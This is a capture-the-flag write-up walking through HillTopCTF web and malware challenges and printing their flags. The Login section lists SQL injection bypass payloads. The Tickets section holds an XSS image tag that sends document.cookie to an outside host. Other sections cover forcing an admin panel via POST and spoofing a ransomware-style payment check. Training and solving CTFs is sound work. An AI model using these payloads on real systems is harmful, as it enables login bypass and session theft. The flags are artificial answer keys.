IF YOU ARE A BEGGINNER PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all what matters is the knowledge acquired


Beep Beep Boop [Warmup]

Hey, Hey you! Yes you! I visited this weird website and suddendly started hearing some beep boop beep sounds... Can you help me figure out what it could be?
This web challenge has multiple references to robots.
When you hear the word robots in the web field, we all know we're talking about talking about Web Wanderers, Crawlers or Spiders. Read more about crawlers here!

These web crawlers are savages! We must control them and tell them where they can go and where they cannot go... This is why there is a common file called "robots.txt".
In this file specifically say what is allowed and what is not. (let's be real here... none of them actually respect it haha)

Having this information, lets now check if there is any robots.txtfile.
Whoa... what did we find here?
User-agent: * Disallow: /NmZmOWQ1MzkwNDdmZGUxNTllODhkMmQxZTExZWY1NzQuaHRtbA==

That looks like Base64... let's try decoding it! 6ff9d539047fde159e88d2d1e11ef574.html

Hummm... looks like a random html page... let's try accessing it.
Beep* Beep* Boop* Beep* Beep* HillTopCTF{Mr_r0b0t_w4s_h3r3_1ak20isjkd}

We got it!

Drop The Anchor [Warmup2]

There isnt much to say about this one... it's pretty much analysing code and giving it the right input.

Quick steps to solve it:

The JS code is analysing 13 chars from an anchor and matching against a specific character.

1st Step - Reverse Engineer the code so we get the right anchor
2nd Step - Add the anchor to the url (#weareanchored)
3rd Step - md5 the anchor and add it to the anchor (#weareanchored_c5c8a607a07dbd08ac8f58499ea1ed19)

tada! ;)

P2SEC 1 - Building

Looking closely at the buttons, some appear to be worned off...
It's a combination of 4 numbers and we know which ones they are... 1 4 6 8

If we inspect the html code, someone left a note on the wall mentioning that the code starts with the number 4.
So all we have to do now is "bruteforce" it.

The right code is 4 1 6 8


P2SEC 2 - Login

This is a simple SQLi (SQL Injection) challenge.
The vulnerable field is Password and some of the following payloads would let the user bypass the login. (there are more)

' or '1'='1
- " or "1"="1
- "or"1"="1
- " OR "1"="1
- "OR"1"="1
tada! we are in!

P2SEC 3 - Tickets

This challenge might be a little bit boring, but its required to make sense to the story line.

Players are first presented with 4 tickets which are perfectly fine.
They must submit answers to all of them in order to progress.

The requirements to a valid answer is just a minimum of 50 characters.
(The content of the answer isn't being analysed, but could be done to make it harder)


Once we've done that for the first 4 tickets, we will unlock 3 more.

Now... the 6th ticket, which is #6841711215 has a small payload to steal the session cookies.
All we have to do is open the source-code and copy the original and unrendered payload.

This is obviously an issue that must be reported... Lets head to the report page and fill the form with:
- 6841711215
- Suspicious Code
- < img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://dumpbin.com/binarygirl1010?c'+document.cookie;>
- Comments are not required.


P2SEC 4 - Escalating

Given the information on the hints, let's crawl for some pages!

I've used DIRB.

Multiple files will come up, but only adminpanel.php is the right one.
If we try to access, it's going to give us a 400 bad Request.

If we change the request method to POST, we are going to start receiving a couple of PHP Errors.
With those errors we will be able to keep adding data to our payload until it's accepted.

Data Required:

- admin_name -> ross (found on the chall's brief)
- action -> set
- level -> 1
- target -> user's cookie

Your final payload should look something like


P2SEC 5 - PromoTest

There isn't much to this challenge... It's more educational than a challenge itself.

Analyse each report and mark them as positive.
This time, the users input is being validated.

If you get your answer wrong, you will be demoted.

Here are the keyword being verified for each ticket. (1 keyword found = pass)

#1 - disable|kill|stop|end|anti
#2 - steal|rob|hijack|credentials|username|password|login|money|cash|bank|credit|bitcoin
#3 - reverse|shell|php|remote|connection|code|execution

When all of them are correctly marked as positive, you will have access to 2 new pages. The flag is in Logs.


P2SEC 6 - Authorities

The following data about the hacker must be submited to be able to retrieve the flag.

- Real Name -> Amy Sophia from https://www.instagram.com/depressedegurl666/ (found plain text in one of the gifs)
- Nickname -> binarygirl1010 (on the ticket payload)
- Real Address -> 62 Matilda St Port Lincoln SA 50606, Australia (me.jpg exif-data)
- Email Address -> h3ll22231144666999@protonmail.com (found on a note after defeating the malware)
- BTC/Paypal Address -> 1Z2Q89voyjwrVkbb6RfHAiLgqCaMs15w4 (in the malware's instructions)
- Known Ip Address -> (from logs)

The IP linking to the hacker could be found on logs by searshing for the same date as the hacker submitted the malicious ticket


P2SEC 6.1 - Tunnel

3 Part Flag.

The malware is considered defeated when the user pays the hacker.
Every 10 seconds an http request is made to a certain IP to check if the payment was done.

This can be achieved using, for example, Fiddler

All the player has to do is:
1st - Intercept the packet on the way back
2nd - Grab the encrypted information
3rd - Decrypt the hash, which is in md5, and follows the format: window's user + _0 (for example: john_0)
4th - Change the flag from 0 to 1
5th - Hash it again in md5
6th - Swap the hashes on the packet

You have now manipulated the malware into thinking that you have paid the hacker!

Part 1 -> base64( HilltopCTF{S1mpl3_m4lwar3_ ) - Hidden in the temp folder of windows (666.txt)
Part 2 -> base64( 4n4lysis_0011 ) - Windows Registery (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\666)
Part 3 -> base64( 0011ks0k2kso} ) - Follow Link on a note on desktop after defeating malware

It was just a simple but fun challenge :p

If you'd like a more detailed writeup on the challenges, feel free to dm me and I will be more than happy to supply you! ❤️